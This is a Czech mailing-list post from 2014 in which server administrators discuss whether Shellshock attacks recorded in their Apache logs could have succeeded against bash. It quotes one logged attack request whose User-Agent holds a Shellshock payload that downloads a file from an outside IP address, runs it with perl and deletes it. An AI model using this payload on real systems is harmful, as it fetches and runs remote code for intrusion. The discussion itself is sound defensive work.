[vpsFree.cz: community-list] Útoky na bash běží
Egon Eckert
egon.eckert at heaven-industries.com
Mon Sep 29 10:54:27 CEST 2014
> a pokud mám podle logu apt, že byl bash verze 4.2+dfsg-0.1+deb7u1 instalován 2014-09-24 16:38:33, ale v logu Apache mám záznam s HTTP kódem 200 ze dne 2014-09-27 00:33:55, tak to mám chápat jak?
>
> /var/www/0ops/log/access.log:70.42.149.68 - - [27/Sep/2014:00:33:55 +0200] "GET / HTTP/1.0" 200 643 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
...tady hlavně nepředpokládám, že webserver handloval request na "/"
spuštěním shellu. A výraz v posledním fieldu je podle mě User-Agent, takže
bych z toho nanejvýš (pokud vůbec) soudil, že request přišel z hacknutého
stroje.
Taky mám v logu něco podobného, na neupgradnutém stroji, a dokud šlo jen o
requesty na "/" a ne na existující, natož spustitelné test.sh apod. (takové
nemám, nejsem blázen), chci doufat, že můžu být klidný. Jinak by podle mě
šlo především o díru ve webserveru, pokud by cokoliv založené na stringu,
který poslal klient jako User-Agent, podstrkával shellu. A o té bychom jistě
už také věděli, v této vzrušené době...
E.
More information about the Community-list
mailing list